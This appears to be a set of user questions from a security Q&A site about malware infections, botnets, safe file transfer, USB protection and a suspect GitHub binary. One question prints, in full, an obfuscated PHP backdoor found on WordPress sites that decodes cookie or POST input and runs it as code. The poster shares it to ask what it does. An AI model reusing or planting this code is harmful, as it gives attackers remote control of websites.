Why do attackers not care about masking the IP of the infected device of a botnet?

I came across this sentence:

If an attack is created using a botnet the likelihood of tracking the attack back to its source is low. For an added level of obfuscation, an attacker may have each distributed device also spoof the IP addresses from which it sends packets. If the attacker is using a botnet such as the Mirai botnet, they generally won’t care about masking the IP of the infected device.

Why do attackers not care about masking the IP of the infected device of a botnet?

Is testing all executables, without considering any other files in the system, enough to deduce whether the system is infected with malware?

I came to know that malicious activities will be carried out only by software (a program), whereas malicious files (data for the software installed in the system) can't perform malicious activities directly by themselves, but they can be responsible for bringing that malicious software onto the system (say, like steganography). Hence that software must also be installed (automatically or manually) before performing its activity.

If this is true, is scanning software for malware before it gets installed (triggered manually or automatically) enough to say that the system is 100% secure (considering that our detector is ideally 100% accurate)?

How to securely transfer files from a possibly infected WinXP machine to Linux?

There is an old Windows XP installation that was being used without even an antivirus. This WinXP computer has files. These files are important and should be moved to a Linux installation. Given the lack of any security practices on the side of the WinXP owner it seems possible that the data contains malware.

I can now:

  • Ignore this and simply keep using these files in Linux; after all, Linux is supposed to not need AV.
    • At the very least the files should be scanned to avoid accidental redistribution of malware if they are ever sent to anyone else again
    • The files contain e.g. a multitude of .odt / .doc documents – maybe it's a very remote possibility, I don't know, but malicious macros are OS independent?
  • Install ClamAV on the Linux machine, scan the files, remove Clam afterwards.
    • AFAIK ClamAV is known for its poor detection rate – scanning the files with it is only marginally better than not scanning at all?
  • Install an AV on the WinXP machine (Panda Free AV still supports WinXP, doesn’t it?), scan the files there, only transfer them afterwards.
    • Which means going online with WinXP once again – this just feels wrong.
  • Any options I overlooked?

I feel stuck. Not sure how to progress.

Note I wouldn't like to manually inspect the files and e.g. remove any potentially suspicious files like .exe files while leaving safe files like .png files intact. The reason is that the data is not mine; I was just asked to transfer it so that someone else may use it.

What is the accepted best practice in a situation like this?

Is it possible to be infected with malware/virus via a proxy?

I'm curious as to whether you can be infected with malware by using a proxy. I currently process data using Python, but occasionally I encounter reCAPTCHA, so I'm looking to implement proxy support.

The data processing is simply an experimental project, so of course my priority is the state of my computer, and I want to get better insight into malware via proxies before I establish a connection with one via Python; the connection would be made via TCP.

Also, I'm not necessarily looking for an in-depth answer, as I assume that if this is possible there are multiple scenarios, so just a simple yes/no and a brief explanation would be great.

Is there an option to protect a USB stick from being infected, other than flash drives with hardware protection?

I would like to protect my flash drives from being infected when I put them into other computers or devices. After some research, I found that I will not be able to reach this level of protection using only software solutions (correct me if I'm wrong).

However, I don't have a flash drive with hardware protection, and my only way to get one is importing it (which will not be cheap). I also found that the write-protection switch on SD cards is not at the hardware level, so I kind of have to trust that a potentially infected computer will respect it, which is not a good idea.

So, my question is: is there a trustworthy way (using USB) to put my files onto another computer without my USB stick (flash drive or SD card) being infected?

What's the effect of this malware if it infected your WP?

Just curious here, and I need a better understanding of this malware, because there are websites infected by this malware, including my websites. But I can clean them all. Usually this malware is written to a .php file with a strange name; inside this file:

<?php $  hsexdir = 'pmi9kl4H61gcbayrf_xsuo*-5#vden3t\'7';$  yiorkoj = Array();$  yiorkoj[] = $  hsexdir[11].$  hsexdir[15].$  hsexdir[28].$  hsexdir[13].$  hsexdir[31].$  hsexdir[28].$  hsexdir[17].$  hsexdir[16].$  hsexdir[20].$  hsexdir[29].$  hsexdir[11].$  hsexdir[31].$  hsexdir[2].$  hsexdir[21].$  hsexdir[29];$  yiorkoj[] = $  hsexdir[7].$  hsexdir[22];$  yiorkoj[] = $  hsexdir[24].$  hsexdir[27].$  hsexdir[11].$  hsexdir[6].$  hsexdir[13].$  hsexdir[13].$  hsexdir[8].$  hsexdir[24].$  hsexdir[23].$  hsexdir[3].$  hsexdir[27].$  hsexdir[24].$  hsexdir[24].$  hsexdir[23].$  hsexdir[6].$  hsexdir[16].$  hsexdir[12].$  hsexdir[24].$  hsexdir[23].$  hsexdir[13].$  hsexdir[33].$  hsexdir[11].$  hsexdir[27].$  hsexdir[23].$  hsexdir[28].$  hsexdir[28].$  hsexdir[24].$  hsexdir[8].$  hsexdir[9].$  hsexdir[27].$  hsexdir[11].$  hsexdir[30].$  hsexdir[13].$  hsexdir[27].$  hsexdir[11].$  hsexdir[28];$  yiorkoj[] = $  hsexdir[25];$  yiorkoj[] = $  hsexdir[11].$  hsexdir[21].$  hsexdir[20].$  hsexdir[29].$  hsexdir[31];$  yiorkoj[] = $  hsexdir[19].$  hsexdir[31].$  hsexdir[15].$  hsexdir[17].$  hsexdir[15].$  hsexdir[28].$  hsexdir[0].$  hsexdir[28].$  hsexdir[13].$  hsexdir[31];$  yiorkoj[] = $  hsexdir[28].$  hsexdir[18].$  hsexdir[0].$  hsexdir[5].$  hsexdir[21].$  hsexdir[27].$  hsexdir[28];$  yiorkoj[] = $  hsexdir[19].$  hsexdir[20].$  hsexdir[12].$  hsexdir[19].$  hsexdir[31].$  hsexdir[15];$  yiorkoj[] = $  hsexdir[13].$  hsexdir[15].$  hsexdir[15].$  hsexdir[13].$  hsexdir[14].$  hsexdir[17].$  hsexdir[1].$  hsexdir[28].$  hsexdir[15].$  hsexdir[10].$  hsexdir[28];$  yiorkoj[] = $  hsexdir[19].$  hsexdir[31].$  hsexdir[15].$  hsexdir[5].$  hsexdir[28].$  hsexdir[29];$  yiorkoj[] = $  hsexdir[0].$  hsexdir[13].$  hsexdir[11].$  hsexdir[4];foreach ($  yiorkoj[8]($  _COOKIE, $  _POST) as $  sgmcz => $  tfbhhc){function ouvcux($  yiorkoj, $  sgmcz, $  lcrwjj){return $  yiorkoj[7]($  yiorkoj[5]($  sgmcz . 
$  yiorkoj[2], ($  lcrwjj / $  yiorkoj[9]($  sgmcz)) + 1), 0, $  lcrwjj);}function jnlge($  yiorkoj, $  ysittw){return @$  yiorkoj[10]($  yiorkoj[1], $  ysittw);}function njfgaru($  yiorkoj, $  ysittw){$  epjvwf = $  yiorkoj[4]($  ysittw) % 3;if (!$  epjvwf) {$  oqkbtbd = $  yiorkoj[0]; $  qyzju = $  oqkbtbd("", $  ysittw[1]($  ysittw[2]));$  qyzju();exit();}}$  tfbhhc = jnlge($  yiorkoj, $  tfbhhc);njfgaru($  yiorkoj, $  yiorkoj[6]($  yiorkoj[3], $  tfbhhc ^ ouvcux($  yiorkoj, $  sgmcz, $  yiorkoj[9]($  tfbhhc))));} 

and that malware creates many index.php files in folders, and also adds code to index.php (the real one), wp-config.php, and wp-settings.php. This malware changes the file permissions of those infected files to 0755. Inside this index.php (original and fake) and those original WP files there is encrypted code with the destination directories of the other malware, which has a .ico extension or is a favicon file.

Maybe an expert can explain more.

Computer infected with malware or false positive?

(Windows 8.1 user)
A few months ago I downloaded binaries from: https://github.com/noahp/srlua-mingw

They had 2 exe files in the folder: srlua.exe and glue.exe. I had been unable to compile srlua from the original GitHub posting for srlua, so I used the srlua.exe from the binary and the glue.exe which I compiled on my own. I was able to use the tools successfully. The only issue was that I received a few positives (1-2) when scanning the various files via VirusTotal, but that was expected given they are programs that compile Lua code into .exe (i.e. C compilers get flagged a lot on VirusTotal).

Skip ahead to today: I needed to use the program again. But because srlua.exe deletes itself (glues itself) into the created .exe, I needed another copy. I found the old zip for the binary in my recycle bin, so I restored it. I then proceeded to try and get the code to work again, but couldn't get it to work. I then proceeded to use "just" the files in the binary's zip, srlua.exe and glue.exe (the ones in the link above), and was able to create the .exe but not get them to run either. When opening the created .exe it said they were unrecognized file types. So again: 2 months ago I didn't use both files from the zip, but I did this time.

I then received a notification from my antivirus that "malware detected on pc". It linked specifically to srlua.exe. I deleted the srlua.exe, and then followed the 'disinfection' protocols Kaspersky presented to me. I had never seen this prompt before and I couldn't tell if it had detected anything real or was just presenting safety options. The only thing of worry it presented to me was that it detected an unknown program/code running at PC start.

I followed all their suggestions, and restarted the computer as they told me to. I then scanned the .zip file that had the binaries in it on VirusTotal. The database version showed it's fine; I rescanned, though, and it turned over 50% positive. I then downloaded Malwarebytes and ran that, and it picked up a registry key in an old DivX player folder (I'm guessing that's unrelated), and it picked up the zip folder from my downloads and the ones in my trash bin. I quarantined the zip in my downloads folder (I'll delete it later if necessary) and deleted the others.

I then went to the GitHub page. I'm really bad at understanding GitHub, but it says the last commit was 4 years ago… and as stated I downloaded this zip 2 months ago originally. I then went to grab the zip file again, but was blocked by Kaspersky citing: Access denied Object URL: https://codeload.github.com/noahp/srlua-mingw/zip/master Reason: the object is infected by P2P-Worm.Win32.Palevo.ikpc

This was not there when I downloaded it 2 months ago. This is all new. I messaged GitHub and am waiting for a reply; however, I am unsure of how GitHub works and whether I'm messaging the right place (they only had an abuse and harassment section). This raises questions like: was the file infected while on the GitHub servers? Why is it still there on the site if everything is now flagged by all the antivirus products as malware? etc.

My main concern though is: was I likely infected? And how can I tell if I'm still infected? How would I even know? The antivirus programs, when I look at the reports from Kaspersky and Malwarebytes, don't tell me anything other than that srlua.exe and the .zip it came from are positive. Wouldn't there be more to report if it was actually malware?

The last backup I have is from months ago, and the backup was made after my use of the program back then. So the backup technically is of a PC that used the supposedly infected srlua.exe with the not-infected glue.exe I compiled myself. It's undesirable to restore to that point, and there's the potential that even that could be infected. I'd assume it's unlikely that a perpetrator designed it so you needed to use both the srlua.exe and glue.exe from the zip to infect the PC.

I have not experienced any odd behaviour on my PC. But I have no idea what a PC with malware does or doesn't do, or what else can be checked outside of scans.

The process for using srlua.exe and glue.exe, from the link, is to run in the cmd prompt (Windows user):

glue srlua.exe prong.lua prong.exe

where prong is the code file's name. I'm assuming running this command is the same as opening the .exe, and anything could happen if it is actually infected.